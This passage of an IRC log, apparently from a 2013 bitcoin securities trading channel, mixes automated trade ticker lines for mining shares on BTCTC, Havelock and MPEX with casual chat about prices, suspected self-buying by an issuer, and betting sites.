0.005229 = 0.1569 BTC [-] Aug 22 02:34:24 [BTCTC] [BASIC-MINING] 1 @ 0.25 BTC [-] Aug 22 02:34:28 [BTCTC] [BASIC-MINING] 3 @ 0.25 = 0.75 BTC [-] Aug 22 02:34:33 [BTCTC] [BASIC-MINING] 42 @ 0.25 = 10.5 BTC [-] Aug 22 02:34:48 [BTCTC] [ACTIVEMINING] 15 @ 0.005229 = 0.0784 BTC [-] Aug 22 02:34:49 [BTCTC] [ASICMINER-PT] 8 @ 2.726 = 21.808 BTC [-] Aug 22 02:34:52 [HAVELOCK] [AM100] 4 @ 0.0275 = 0.11 BTC [-] Aug 22 02:35:39 [BTCTC] [ASICMINER-PT] 3 @ 2.723 = 8.169 BTC [-] Aug 22 02:35:51 [BTCTC] [TAT.ASICMINER] 9 @ 0.02925 = 0.2633 BTC [+] Aug 22 02:35:52 [BTCTC] [ASICMINER-PT] 5 @ 2.721 = 13.605 BTC [-] Aug 22 02:35:53 [BTCTC] [ACTIVEMINING] 30 @ 0.005431 = 0.1629 BTC [+] Aug 22 02:36:00 [BTCTC] [ASICMINER-PT] 1 @ 2.75 BTC [+] Aug 22 02:36:03 [HAVELOCK] [AM100] 2 @ 0.0275 = 0.055 BTC [-] Aug 22 02:36:18 [BTCTC] [ACTIVEMINING] 30 @ 0.005431 = 0.1629 BTC [+] Aug 22 02:36:22 [BTCTC] [ASICMINER-PT] 1 @ 2.723 BTC [-] Aug 22 02:36:36 [BTCTC] [ASICMINER-PT] 10 @ 2.721 = 27.21 BTC [-] Aug 22 02:36:37 [BTCTC] [ACTIVEMINING] 15 @ 0.005431 = 0.0815 BTC [+] Aug 22 02:37:11 [BTCTC] [ASICMINER-PT] 1 @ 2.723 BTC [+] Aug 22 02:37:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.02923 BTC [-] Aug 22 02:37:28 [BTCTC] [ASICMINER-PT] 10 @ 2.72 = 27.2 BTC [-] Aug 22 02:37:43 [BTCTC] [ACTIVEMINING] 30 @ 0.005219 = 0.1566 BTC [-] Aug 22 02:38:12 [BTCTC] [ACTIVEMINING] 30 @ 0.005219 = 0.1566 BTC [-] Aug 22 02:38:13 [BTCTC] [ASICMINER-PT] 1 @ 3.25 BTC [+] Aug 22 02:38:14 [BTCTC] [TAT.ASICMINER] 6 @ 0.02682 = 0.1609 BTC [-] Aug 22 02:38:17 [HAVELOCK] [AM100] 6 @ 0.027 = 0.162 BTC [-] Aug 22 02:38:36 [BTCTC] [ACTIVEMINING] 15 @ 0.005219 = 0.0783 BTC [-] Aug 22 02:39:12 [HAVELOCK] [AM100] 5 @ 0.02652 = 0.1326 BTC [-] Aug 22 02:39:51 [HAVELOCK] [AM100] 1 @ 0.027 BTC [+] Aug 22 02:40:10 [HAVELOCK] [AM100] 3 @ 0.027 = 0.081 BTC [+] Aug 22 02:41:17 [BTCTC] [ACTIVEMINING] 30 @ 0.005433 = 0.163 BTC [+] Aug 22 02:41:38 [HAVELOCK] [VTX] 29 @ 0.555 = 16.095 BTC [-] Aug 22 02:41:47 [BTCTC] [ACTIVEMINING] 30 @ 0.005433 = 0.163 BTC [+] Aug 22 02:42:10 [HAVELOCK] [AM100] 155 @ 0.027 = 4.185 BTC [+] Aug 22 02:42:16 [BTCTC] [ASICMINER-PT] 2 @ 2.724 = 5.448 BTC [-] Aug 22 02:42:17 [HAVELOCK] [AM100] 4 @ 0.0275 = 0.11 BTC [+] Aug 22 02:42:23 [HAVELOCK] [AM100] 190 @ 0.02750001 = 5.225 BTC [+] Aug 22 02:42:35 [BTCTC] [ACTIVEMINING] 15 @ 0.005433 = 0.0815 BTC [+] Aug 22 02:42:41 [HAVELOCK] [AM100] 10 @ 0.02799 = 0.2799 BTC [+] Aug 22 02:43:04 [BTCTC] [ASICMINER-PT] 4 @ 2.72 = 10.88 BTC [-] Aug 22 02:43:18 Hour long call with paypal we'll see where that takes me Aug 22 02:43:32 [HAVELOCK] [AM100] 5 @ 0.02653 = 0.1327 BTC [-] Aug 22 02:43:34 [HAVELOCK] [AM100] 30 @ 0.02652 = 0.7956 BTC [-] Aug 22 02:43:36 [HAVELOCK] [AM100] 1 @ 0.02651 BTC [-] Aug 22 02:43:38 [HAVELOCK] [AM100] 2 @ 0.02650001 = 0.053 BTC [-] Aug 22 02:43:40 [HAVELOCK] [AM100] 1 @ 0.0263 BTC [-] Aug 22 02:43:42 [HAVELOCK] [AM100] 2 @ 0.0251 = 0.0502 BTC [-] Aug 22 02:43:44 [HAVELOCK] [AM100] 9 @ 0.025001 = 0.225 BTC [-] Aug 22 02:43:46 [HAVELOCK] [AM100] 25 @ 0.025 = 0.625 BTC [-] Aug 22 02:43:48 [HAVELOCK] [AM100] 5 @ 0.025 = 0.125 BTC [-] Aug 22 02:43:50 [HAVELOCK] [AM100] 20 @ 0.025 = 0.5 BTC [-] Aug 22 02:43:52 [HAVELOCK] [AM100] 26 @ 0.021 = 0.546 BTC [-] Aug 22 02:43:55 [HAVELOCK] [AM100] 298 @ 0.0202 = 6.0196 BTC [-] Aug 22 02:43:57 [BTCTC] [ACTIVEMINING] 30 @ 0.005219 = 0.1566 BTC [-] Aug 22 02:43:57 [BTCTC] [ACTIVEMINING] 1 @ 0.005218 BTC [-] Aug 22 02:43:58 [BTCTC] [ASICMINER-PT] 1 @ 2.718 BTC [-] Aug 22 02:44:05 [BTCTC] [ACTIVEMINING] 29 @ 0.005218 = 0.1513 BTC [-] Aug 22 02:44:39 [BTCTC] [ACTIVEMINING] 15 @ 0.005216 = 0.0782 BTC [-] Aug 22 02:44:57 [BTCTC] [ACTIVEMINING] 5 @ 0.005219 = 0.0261 BTC [+] Aug 22 02:45:03 [BTCTC] [TAT.ASICMINER] 2 @ 0.02945 = 0.0589 BTC [+] Aug 22 02:45:16 [BTCTC] [TAT.ASICMINER] 67 @ 0.02901 = 1.9437 BTC [-] Aug 22 02:45:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.02945 BTC [+] Aug 22 02:45:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.029 BTC [-] Aug 22 02:45:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.0269 BTC [-] Aug 22 02:46:00 [BTCTC] [TAT.ASICMINER] 19 @ 0.02685 = 0.5102 BTC [-] Aug 22 02:46:59 [HAVELOCK] [VTX] 2 @ 0.555 = 1.11 BTC [-] Aug 22 02:47:31 [HAVELOCK] [XBOND] 23 @ 0.00114 = 0.0262 BTC [+] Aug 22 02:47:40 [BTCTC] [TAT.ASICMINER] 7 @ 0.02685 = 0.188 BTC [-] Aug 22 02:47:46 [HAVELOCK] [AM1] 1 @ 2.75 BTC [+] Aug 22 02:47:48 [HAVELOCK] [AM1] 1 @ 2.7100001 BTC [-] Aug 22 02:48:10 [HAVELOCK] [AM1] 2 @ 2.71 = 5.42 BTC [-] Aug 22 02:49:11 [BTCTC] [ASICMINER-PT] 1 @ 2.717 BTC [-] Aug 22 02:49:12 [BTCTC] [ASICMINER-PT] 4 @ 2.717 = 10.868 BTC [-] Aug 22 02:49:14 [BTCTC] [ASICMINER-PT] 6 @ 2.716 = 16.296 BTC [-] Aug 22 02:49:15 [BTCTC] [ASICMINER-PT] 1 @ 2.713 BTC [-] Aug 22 02:49:15 [BTCTC] [ASICMINER-PT] 1 @ 2.712 BTC [-] Aug 22 02:49:16 [BTCTC] [ASICMINER-PT] 1 @ 2.712 BTC [-] Aug 22 02:49:18 [BTCTC] [ASICMINER-PT] 1 @ 2.712 BTC [-] Aug 22 02:49:19 [BTCTC] [ASICMINER-PT] 11 @ 2.712 = 29.832 BTC [-] Aug 22 02:49:20 [BTCTC] [ASICMINER-PT] 2 @ 2.711 = 5.422 BTC [-] Aug 22 02:49:29 it's getting ridiculous Aug 22 02:49:31 [BTCTC] [HOSTED-MINING] 15 @ 0.271 = 4.065 BTC [-] Aug 22 02:49:33 [BTCTC] [HOSTED-MINING] 5 @ 0.27 = 1.35 BTC [-] Aug 22 02:50:21 [BTCTC] [ASICMINER-PT] 1 @ 2.891 BTC [+] Aug 22 02:50:37 [BTCTC] [ASICMINER-PT] 1 @ 2.892 BTC [+] Aug 22 02:50:41 [BTCTC] [ACTIVEMINING] 4 @ 0.005488 = 0.022 BTC [+] Aug 22 02:50:41 [BTCTC] [ASICMINER-PT] 1 @ 2.893 BTC [+] Aug 22 02:50:48 It's moving toward an acceptable price Aug 22 02:51:43 [BTCTC] [LABCOIN] 2 @ 0.002323 = 0.0046 BTC [+] Aug 22 02:51:48 nobody knows what fair price is obviously, it it moves like this Aug 22 02:52:05 it was 4.7 a few weeks ago Aug 22 02:52:14 now 2.7 Aug 22 02:52:22 that means the market hasn't got a clue Aug 22 02:52:33 dude stick around Aug 22 02:52:44 def not as simple as that, but i agree with the statement in and of itself Aug 22 02:52:53 this is bitcoin, in general there is no clue to be had Aug 22 02:53:01 ^ Aug 22 02:53:06 agreed :p Aug 22 02:53:15 it's so much fun though Aug 22 02:53:22 just seems highly sensitive to dividends Aug 22 02:53:28 wall street is a boring pensioner's club :D Aug 22 02:53:51 is AM working on or deploying next gen anytime soon? Aug 22 02:54:13 im with dub Aug 22 02:55:04 [BTCTC] [DMS.MINING] 6 @ 0.003705 = 0.0222 BTC [+] Aug 22 02:55:47 [BTCTC] [TAT.ASICMINER] 13 @ 0.02886 = 0.3752 BTC [+] Aug 22 02:56:53 [HAVELOCK] [AM100] 10 @ 0.02501 = 0.2501 BTC [+] Aug 22 02:56:56 [HAVELOCK] [AM100] 2 @ 0.025 = 0.05 BTC [-] Aug 22 02:57:00 is AM working on or deploying next gen anytime soon? <<< there is already public info available about the schedule for gen2 Aug 22 02:57:55 [HAVELOCK] [AM100] 20 @ 0.025 = 0.5 BTC [-] Aug 22 02:58:16 [BTCTC] [TAT.ASICMINER] 3 @ 0.02885 = 0.0866 BTC [-] Aug 22 02:58:29 [BTCTC] [TAT.ASICMINER] 10 @ 0.02885 = 0.2885 BTC [-] Aug 22 02:58:31 [BTCTC] [DMS.PURCHASE] 1 @ 0.02061 BTC [+] Aug 22 02:59:43 fucking dry spell. 10 hours i had the sprinklers running today. Aug 22 03:00:16 [HAVELOCK] [AM100] 18 @ 0.025 = 0.45 BTC [-] Aug 22 03:00:52 [BTCTC] [ASICMINER-PT] 1 @ 2.801 BTC [-] Aug 22 03:00:53 [BTCTC] [ASICMINER-PT] 10 @ 2.8 = 28 BTC [-] Aug 22 03:00:55 [BTCTC] [HOSTED-MINING] 1 @ 0.27 BTC [-] Aug 22 03:01:23 [BTCTC] [ACTIVEMINING] 30 @ 0.005229 = 0.1569 BTC [-] Aug 22 03:01:24 [BTCTC] [ACTIVEMINING] 68 @ 0.005228 = 0.3555 BTC [-] Aug 22 03:01:26 [BTCTC] [ACTIVEMINING] 19 @ 0.005224 = 0.0993 BTC [-] Aug 22 03:01:27 [BTCTC] [ACTIVEMINING] 483 @ 0.005161 = 2.4928 BTC [-] Aug 22 03:02:12 [BTCTC] [TAT.ASICMINER] 9 @ 0.02846 = 0.2561 BTC [-] Aug 22 03:02:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.02846 BTC [-] Aug 22 03:06:20 [HAVELOCK] [AM100] 2 @ 0.0279 = 0.0558 BTC [+] Aug 22 03:07:12 [HAVELOCK] [AM100] 6 @ 0.0279 = 0.1674 BTC [+] Aug 22 03:08:13 [BTCTC] [ASICMINER-PT] 1 @ 2.733 BTC [-] Aug 22 03:08:36 [BTCTC] [ASICMINER-PT] 1 @ 2.731 BTC [-] Aug 22 03:08:55 [HAVELOCK] [AM100] 3 @ 0.0279 = 0.0837 BTC [+] Aug 22 03:09:07 [BTCTC] [ASICMINER-PT] 1 @ 2.731 BTC [-] Aug 22 03:09:45 [BTCTC] [DMS.MINING] 77 @ 0.003705 = 0.2853 BTC [+] Aug 22 03:10:15 [BTCTC] [TAT.ASICMINER] 10 @ 0.028 = 0.28 BTC [-] Aug 22 03:10:35 [HAVELOCK] [AM100] 3 @ 0.02351 = 0.0705 BTC [-] Aug 22 03:10:38 [HAVELOCK] [AM100] 9 @ 0.02351 = 0.2116 BTC [-] Aug 22 03:10:40 [HAVELOCK] [AM100] 19 @ 0.0235 = 0.4465 BTC [-] Aug 22 03:10:49 [BTCTC] [TAT.ASICMINER] 2 @ 0.02723 = 0.0545 BTC [-] Aug 22 03:12:26 [HAVELOCK] [AM100] 1 @ 0.027 BTC [+] Aug 22 03:12:32 [HAVELOCK] [XBOND] 250 @ 0.00114 = 0.285 BTC [+] Aug 22 03:13:02 [BTCTC] [DMS.MINING] 3 @ 0.003705 = 0.0111 BTC [+] Aug 22 03:13:17 [HAVELOCK] [AM100] 2 @ 0.02699995 = 0.054 BTC [-] Aug 22 03:13:18 [BTCTC] [TAT.ASICMINER] 14 @ 0.02725 = 0.3815 BTC [+] Aug 22 03:13:30 [HAVELOCK] [XBOND] 300 @ 0.0011445 = 0.3434 BTC [+] Aug 22 03:13:46 [HAVELOCK] [XBOND] 75 @ 0.0011445 = 0.0858 BTC [+] Aug 22 03:14:04 [HAVELOCK] [XBOND] 5 @ 0.0011445 = 0.0057 BTC [+] Aug 22 03:14:22 [HAVELOCK] [XBOND] 4 @ 0.0011445 = 0.0046 BTC [+] Aug 22 03:14:36 [HAVELOCK] [XBOND] 1 @ 0.0011445 BTC [+] Aug 22 03:14:52 So... I missed the massive buy on CFIG. What's the scoop there? Aug 22 03:14:59 [BTCTC] [ASICMINER-PT] 1 @ 2.73 BTC [-] Aug 22 03:15:01 [BTCTC] [ASICMINER-PT] 1 @ 2.715 BTC [-] Aug 22 03:15:02 [BTCTC] [ASICMINER-PT] 1 @ 2.714 BTC [-] Aug 22 03:15:03 [BTCTC] [ASICMINER-PT] 1 @ 2.713 BTC [-] Aug 22 03:15:03 [BTCTC] [ASICMINER-PT] 1 @ 2.713 BTC [-] Aug 22 03:15:05 [BTCTC] [ASICMINER-PT] 1 @ 2.712 BTC [-] Aug 22 03:15:06 [BTCTC] [ASICMINER-PT] 10 @ 2.712 = 27.12 BTC [-] Aug 22 03:15:07 [BTCTC] [ASICMINER-PT] 4 @ 2.711 = 10.844 BTC [-] Aug 22 03:15:58 !ticker btct asicminer-pt Aug 22 03:16:00 [BTCT:ASICMINER-PT] 1D: 2.6 / 3.12896 / 3.648 (1221 shares, 3820.5 BTC), 7D: 2.6 / 3.45293 / 3.999 (2762 shares, 9537 BTC), 30D: 2.6 / 4.01129 / 4.989 (13990 shares, 56117.9 BTC) Aug 22 03:16:17 [BTCTC] [ASICMINER-PT] 1 @ 2.711 BTC [-] Aug 22 03:17:20 !ticker havelock cfig Aug 22 03:17:23 [HAVELOCK:CFIG] 1D: 0.15000000 / 0.15 / 0.15000000 (76 shares, 11.40000000 BTC), 7D: 0.15000000 / 0.15 / 0.15000000 (1674 shares, 251.10000000 BTC), 30D: 0.15000000 / 0.15 / 0.15000000 (4211 shares, 631.65000000 BTC) Aug 22 03:17:23 :( Aug 22 03:17:25 :) Aug 22 03:17:56 O.o Aug 22 03:18:21 Someone bought around 50000 shares over on Havelock... Aug 22 03:18:48 they have $1.5M currently raised... Aug 22 03:19:28 Someone with big pockets REALLY wants to see the IPO be successful. Aug 22 03:20:06 i'm not seeing such a buy Aug 22 03:20:08 where? Aug 22 03:20:16 so how much is this someone with big pockets pay per shill ? Aug 22 03:20:22 I see this: Aug 22 03:20:29 Units Available: 50000 Aug 22 03:20:32 U Aug 22 03:20:43 Units Remaining: 45789 Aug 22 03:21:03 remaining out of their 3rd or 4th tranche Aug 22 03:21:14 4 tranches of 50k each Aug 22 03:21:16 [BTCTC] [LABCOIN] 20 @ 0.002297 = 0.0459 BTC [-] Aug 22 03:21:17 [BTCTC] [LABCOIN] 260 @ 0.002297 = 0.5972 BTC [-] Aug 22 03:21:19 [BTCTC] [LABCOIN] 3000 @ 0.002296 = 6.888 BTC [-] Aug 22 03:21:19 [BTCTC] [LABCOIN] 190 @ 0.00228 = 0.4332 BTC [-] Aug 22 03:21:20 [BTCTC] [LABCOIN] 4385 @ 0.00228 = 9.9978 BTC [-] Aug 22 03:21:21 [BTCTC] [LABCOIN] 5000 @ 0.002265 = 11.325 BTC [-] Aug 22 03:21:22 [BTCTC] [LABCOIN] 687 @ 0.002252 = 1.5471 BTC [-] Aug 22 03:21:23 [BTCTC] [LABCOIN] 500 @ 0.002251 = 1.1255 BTC [-] Aug 22 03:21:24 Start Date: 2013-08-12 12:00:00 Aug 22 03:21:25 [BTCTC] [LABCOIN] 5000 @ 0.00225 = 11.25 BTC [-] Aug 22 03:21:27 is what it says Aug 22 03:21:27 [HAVELOCK] [AM100] 1 @ 0.02699 BTC [-] Aug 22 03:21:31 [BTCTC] [LABCOIN] 30 @ 0.00225 = 0.0675 BTC [-] Aug 22 03:21:40 o look, someone with deep pockets really wants to see labcoin succeed too. Aug 22 03:21:53 okay i see now Aug 22 03:21:57 this is the 3rd tranche Aug 22 03:22:43 so theyve raaised 15k btc? Aug 22 03:22:49 :/ Aug 22 03:22:50 i'm shocked frankly, i'd be tempted to bet money the buyer is CFIG paying themselves to make the stock look better Aug 22 03:23:00 and where do they get 15k btc? Aug 22 03:23:04 Duffer1 problem is you don't have anyone to bet against. Aug 22 03:23:14 hehe Aug 22 03:23:38 [BTCTC] [DMS.MINING] 3 @ 0.003705 = 0.0111 BTC [+] Aug 22 03:23:49 [BTCTC] [TAT.ASICMINER] 3 @ 0.02731 = 0.0819 BTC [+] Aug 22 03:23:50 [BTCTC] [TAT.ASICMINER] 4 @ 0.0273 = 0.1092 BTC [-] Aug 22 03:23:51 [BTCTC] [TAT.ASICMINER] 14 @ 0.0273 = 0.3822 BTC [-] Aug 22 03:23:53 [HAVELOCK] [XBOND] 57 @ 0.0011445 = 0.0652 BTC [+] Aug 22 03:24:00 ThickAsThieves they got it at the kleeck factory. down the street from the pipedream depot. Aug 22 03:24:29 mmm pipes Aug 22 03:25:59 https://bitcointalk.org/index.php?topic=269191.msg2879513#msg2879513 Aug 22 03:26:04 the thread is pretty hysterical, actually. Aug 22 03:26:08 [HAVELOCK] Crypto Currency (CFIG) Official Thread Aug 22 03:26:20 so many words the author can't afford. Aug 22 03:26:36 i think they have me on ignore now :P Aug 22 03:27:07 http://bitbet.us/bet/495/there-will-be-blood/ Aug 22 03:27:11 pretty decent odds on that yet. Aug 22 03:27:13 BitBet - There will be blood Aug 22 03:27:14 anyone that mixes fiat money with btc is doomed Aug 22 03:28:17 it's obvious that no western government will allow such ventures to succeed and grow Aug 22 03:28:33 as it represents a deadly threat to their own existence Aug 22 03:28:46 it would be interesting to see who believes which exchange is the weak link in that bet Aug 22 03:28:59 oh it's BF Aug 22 03:29:06 yep Aug 22 03:29:11 [HAVELOCK] [AM100] 2 @ 0.02689 = 0.0538 BTC [-] Aug 22 03:29:15 that's my guess too, but it's been around Aug 22 03:29:23 yea Aug 22 03:29:23 Well we're not that far from December 12th at which point all exchanges will be 1 year old Aug 22 03:29:40 Namworld gotta have short terms with these things. Aug 22 03:29:44 otherwise nobody'd stake on them Aug 22 03:30:01 soon mtgox will be dead and mpex will be literally the oldest thing in btc Aug 22 03:30:02 [HAVELOCK] [AM100] 16 @ 0.0269 = 0.4304 BTC [+] Aug 22 03:30:06 at what, 3-4 years of age. Aug 22 03:31:01 lol free money http://bitbet.us/bet/517/bfl-will-deliver-28nm-before-jan-6-2014/ Aug 22 03:31:24 Havelock is already 1 year old. Aug 22 03:31:28 they'll deliver a unit to luke on jan 5 Aug 22 03:31:48 dub luke doesn't count. Aug 22 03:31:49 he'll use his penis to confirm it is indeed 28nm Aug 22 03:32:06 bet resolves if 10 confirmed custies Aug 22 03:32:23 lmao why so mean Aug 22 03:33:13 [HAVELOCK] [SDSTM] 142 @ 0.00390001 = 0.5538 BTC [+] Aug 22 03:33:21 they kinda deserve it :P Aug 22 03:33:47 [HAVELOCK] [AM100] 2 @ 0.02555 = 0.0511 BTC [-] Aug 22 03:34:02 for some values of kinda ranging from infinity to infinity. Aug 22 03:34:14 lol Aug 22 03:34:34 i'd like to see a decentralized p2p exchange system based on a similar protocol as torrent, with it's own public blockchain Aug 22 03:34:36 [HAVELOCK] [AM100] 31 @ 0.0255 = 0.7905 BTC [-] Aug 22 03:34:39 [HAVELOCK] [AM100] 2 @ 0.02511 = 0.0502 BTC [-] Aug 22 03:34:41 [BTCTC] [ASICMINER-PT] 1 @ 2.869 BTC [+] Aug 22 03:34:53 again with this. Aug 22 03:34:58 participants would run their opensource clients and no central server would exist Aug 22 03:35:12 why does everyone come up with this same exact brilliant idea all the time. Aug 22 03:35:23 lol Aug 22 03:35:27 [BTCTC] [ACTIVEMINING] 10 @ 0.00531 = 0.0531 BTC [+] Aug 22 03:35:36 well at some point it's coming i believe Aug 22 03:35:37 but anyway, in other news : i bought 10bn worth of ice shit in eve yest. today there's a blocade on ice shit. Aug 22 03:36:07 [BTCTC] [DMS.MINING] 250 @ 0.003699 = 0.9248 BTC [-] Aug 22 03:36:08 [BTCTC] [DMS.MINING] 250 @ 0.003655 = 0.9138 BTC [-] Aug 22 03:36:29 [BTCTC] [ASICMINER-PT] 1 @ 2.87 BTC [+] Aug 22 03:36:33 [BTCTC] [LABCOIN] 30 @ 0.002317 = 0.0695 BTC [+] Aug 22 03:36:34 [BTCTC] [LABCOIN] 2 @ 0.002318 = 0.0046 BTC [+] Aug 22 03:36:35 [BTCTC] [LABCOIN] 20 @ 0.00232 = 0.0464 BTC [+] Aug 22 03:36:43 [BTCTC] [LABCOIN] 30 @ 0.002321 = 0.0696 BTC [+] Aug 22 03:36:55 [BTCTC] [ASICMINER-PT] 1 @ 3.4 BTC [+] Aug 22 03:37:22 k, wtf Aug 22 03:37:25 another option? Aug 22 03:37:45 2.87 to 3.4 is quite the jump Aug 22 03:38:05 [HAVELOCK] [AM100] 1 @ 0.0278 BTC [+] Aug 22 03:38:11 [HAVELOCK] [LABCO] 180 @ 0.002 = 0.36 BTC [-] Aug 22 03:38:17 doesn't show Aug 22 03:38:32 oh, rite Aug 22 03:38:35 a put option Aug 22 03:39:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.02826 BTC [+] Aug 22 03:41:26 [BTCTC] [TAT.ASICMINER] 6 @ 0.02728 = 0.1637 BTC [-] Aug 22 03:41:28 [BTCTC] [TAT.ASICMINER] 28 @ 0.02728 = 0.7638 BTC [-] Aug 22 03:41:29 [BTCTC] [TAT.ASICMINER] 3 @ 0.02727 = 0.0818 BTC [-] Aug 22 03:41:29 [BTCTC] [TAT.ASICMINER] 11 @ 0.02725 = 0.2998 BTC [-] Aug 22 03:41:31 [BTCTC] [TAT.ASICMINER] 50 @ 0.02701 = 1.3505 BTC [-] Aug 22 03:41:32 [BTCTC] [TAT.ASICMINER] 75 @ 0.027 = 2.025 BTC [-] Aug 22 03:41:33 [BTCTC] [TAT.ASICMINER] 72 @ 0.02684 = 1.9325 BTC [-] Aug 22 03:44:31 People put money on anything, bah Aug 22 03:44:40 So many thousands of BTC are wasted Aug 22 03:44:52 They'd have been better off gambling it ._. Aug 22 03:45:17 some bitcoiners would be much better served playing eve. Aug 22 03:45:31 interesting exchange with kslaughter and VE on the labcoin thread Aug 22 03:45:33 lol Aug 22 03:45:34 [BTCTC] [ACTIVEMINING] 30 @ 0.005324 = 0.1597 BTC [+] Aug 22 03:45:35 [BTCTC] [ACTIVEMINING] 6 @ 0.005325 = 0.032 BTC [+] Aug 22 03:45:36 [BTCTC] [ACTIVEMINING] 57 @ 0.005334 = 0.304 BTC [+] Aug 22 03:45:37 [BTCTC] [ACTIVEMINING] 68 @ 0.005336 = 0.3628 BTC [+] Aug 22 03:45:38 [BTCTC] [ACTIVEMINING] 83 @ 0.005343 = 0.4435 BTC [+] Aug 22 03:45:39 [BTCTC] [ACTIVEMINING] 415 @ 0.005344 = 2.2178 BTC [+] Aug 22 03:45:41 [MPEX] [S.MPOE] 9600 @ 0.00083023 = 7.9702 BTC [+] Aug 22 03:45:41 [MPEX] [S.MPOE] 2197 @ 0.0008279 = 1.8189 BTC [-] Aug 22 03:45:43 [MPEX] [S.MPOE] 7994 @ 0.0008273 = 6.6134 BTC [-] Aug 22 03:46:29 so lulzy how the actual miner is plumeting and all the scams are floating as if nothing happened. Aug 22 03:46:37 idiots. Aug 22 03:46:49 can't even scam right, let alone do anything useful with themselves. Aug 22 03:47:27 [BTCTC] [ASICMINER-PT] 4 @ 2.878 = 11.512 BTC [-] Aug 22 03:47:29 [BTCTC] [DMS.SELLING] 9 @ 0.01721 = 0.1549 BTC [+] Aug 22 03:47:30 [BTCTC] [ASICMINER-PT] 1 @ 2.879 BTC [+] Aug 22 03:47:31 [BTCTC] [DMS.SELLING] 1 @ 0.0172 BTC [-] Aug 22 03:48:11 [BTCTC] [ASICMINER-PT] 2 @ 2.899 = 5.798 BTC [+] Aug 22 03:48:30 [BTCTC] [ASICMINER-PT] 2 @ 3.4 = 6.8 BTC [+] Aug 22 03:48:53 [BTCTC] [LABCOIN] 80 @ 0.002324 = 0.1859 BTC [+] Aug 22 03:48:54 [BTCTC] [LABCOIN] 187 @ 0.002324 = 0.4346 BTC [+] Aug 22 03:48:56 [BTCTC] [LABCOIN] 433 @ 0.002325 = 1.0067 BTC [+] Aug 22 03:50:27 mircea_popescu ever considered upgrading your UI to this century? Aug 22 03:50:33 gecko_x2: Aug 22 03:50:39 get the fuck out of here with that shit Aug 22 03:50:45 this discussion need not happen again Aug 22 03:50:53 roger that Aug 22 03:50:56 lol Aug 22 03:50:59 sry :p Aug 22 03:51:05 gecko_x2 use coinbr.com Aug 22 03:51:08 or make your own Aug 22 03:51:35 :D Aug 22 03:52:18 no but srsly. why not just use coinbr ? Aug 22 03:52:47 [BTCTC] [ASICMINER-PT] 6 @ 2.899 = 17.394 BTC [-] Aug 22 03:52:47 i dunno what that is Aug 22 03:52:48 [BTCTC] [ASICMINER-PT] 2 @ 2.9 = 5.8 BTC [+] Aug 22 03:53:26 right Aug 22 03:53:29 it's a gui for mpex Aug 22 03:53:42 well really it's a broker, but anyway. Aug 22 03:54:31 [BTCTC] [TAT.ASICMINER] 8 @ 0.02823 = 0.2258 BTC [+] Aug 22 03:54:41 yea checked it out.. Aug 22 03:54:50 good 2 know Aug 22 03:54:58 [BTCTC] [ASICMINER-PT] 3 @ 2.899 = 8.697 BTC [-] Aug 22 03:54:59 [BTCTC] [ASICMINER-PT] 11 @ 2.9 = 31.9 BTC [+] Aug 22 03:56:21 anyways you're right, real men don't need colourful interfaces that appeal to women :p especially when it's about making money Aug 22 03:56:22 lol mircea_popescu was right about the 3.0 on asic miner Aug 22 03:56:29 [BTCTC] [ASICMINER-PT] 1 @ 2.899 BTC [-] Aug 22 03:56:32 [BTCTC] [ASICMINER-PT] 7 @ 2.9 = 20.3 BTC [+] Aug 22 03:58:57 [BTCTC] [LABCOIN] 118 @ 0.002321 = 0.2739 BTC [-] Aug 22 03:59:51 0.00258 labcoin call option exp 1d23h on BTCTC a good buy? Aug 22 04:00:33 gecko_x2 most users talk to mpex via custom scripts anyway Aug 22 04:00:57 https://www.youtube.com/watch?v=kFOklYTQXWQ Aug 22 04:01:00 these never get old Aug 22 04:01:00 Hitler got screwed by selling Bitcoin for MtGox fiat - YouTube Aug 22 04:01:27 dub it's because you're young at hearty. Aug 22 04:04:34 [BTCTC] [TAT.ASICMINER] 7 @ 0.02822 = 0.1975 BTC [-] Aug 22 04:05:34 [BTCTC] [BTC-GROWTH] 250 @ 0.1 = 25 BTC [+] Aug 22 04:07:54 ""The topic or board you are looking for appears to be either missing or off limits to you." Aug 22 04:07:54 and this: Aug 22 04:07:54 "Auction suspended, looks like 2.7 is the bottom of the market haha. Thank you to all buyers."" Aug 22 04:08:20 lol Aug 22 04:08:30 never a dull moment Aug 22 04:09:12 https://bitcointalk.org/index.php?topic=99497.msg2983541#msg2983541 Aug 22 04:09:17 ASICMINER: Entering the Future of ASIC Mining by Inventing It Aug 22 04:09:38 [BTCTC] [ACTIVEMINING] 30 @ 0.005421 = 0.1626 BTC [+] Aug 22 04:09:42 [BTCTC] [ASICMINER-PT] 1 @ 2.989 BTC [+] Aug 22 04:09:45 [BTCTC] [TAT.ASICMINER] 10 @ 0.02822 = 0.2822 BTC [-] Aug 22 04:09:46 [BTCTC] [ASICMINER-PT] 9 @ 2.99 = 26.91 BTC [+] Aug 22 04:10:25 [BTCTC] [DMS.SELLING] 9 @ 0.0172 = 0.1548 BTC [-] Aug 22 04:10:31 [BTCTC] [ACTIVEMINING] 30 @ 0.005421 = 0.1626 BTC [+] Aug 22 04:11:05 Someone put 3000 shares for sale? Aug 22 04:11:14 [BTCTC] [TAT.ASICMINER] 10 @ 0.02822 = 0.2822 BTC [-] Aug 22 04:11:15 [BTCTC] [ACTIVEMINING] 30 @ 0.005421 = 0.1626 BTC [+] Aug 22 04:11:20 [BTCTC] [ASICMINER-PT] 2 @ 2.99 = 5.98 BTC [+] Aug 22 04:11:21 [BTCTC] [TAT.ASICMINER] 14 @ 0.02823 = 0.3952 BTC [+] Aug 22 04:11:23 [BTCTC] [ASICMINER-PT] 7 @ 3 = 21 BTC [+] Aug 22 04:11:25 [BTCTC] [ASICMINER-PT] 1 @ 3 BTC [+] Aug 22 04:12:22 [BTCTC] [COGNITIVE] 1 @ 0.3206 BTC [+] Aug 22 04:13:27 [BTCTC] [TAT.ASICMINER] 67 @ 0.0282 = 1.8894 BTC [-] Aug 22 04:13:30 [BTCTC] [TAT.ASICMINER] 7 @ 0.02821 = 0.1975 BTC [+] Aug 22 04:13:31 [BTCTC] [TAT.ASICMINER] 36 @ 0.02822 = 1.0159 BTC [+] Aug 22 04:13:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.02828 BTC [+] Aug 22 04:13:34 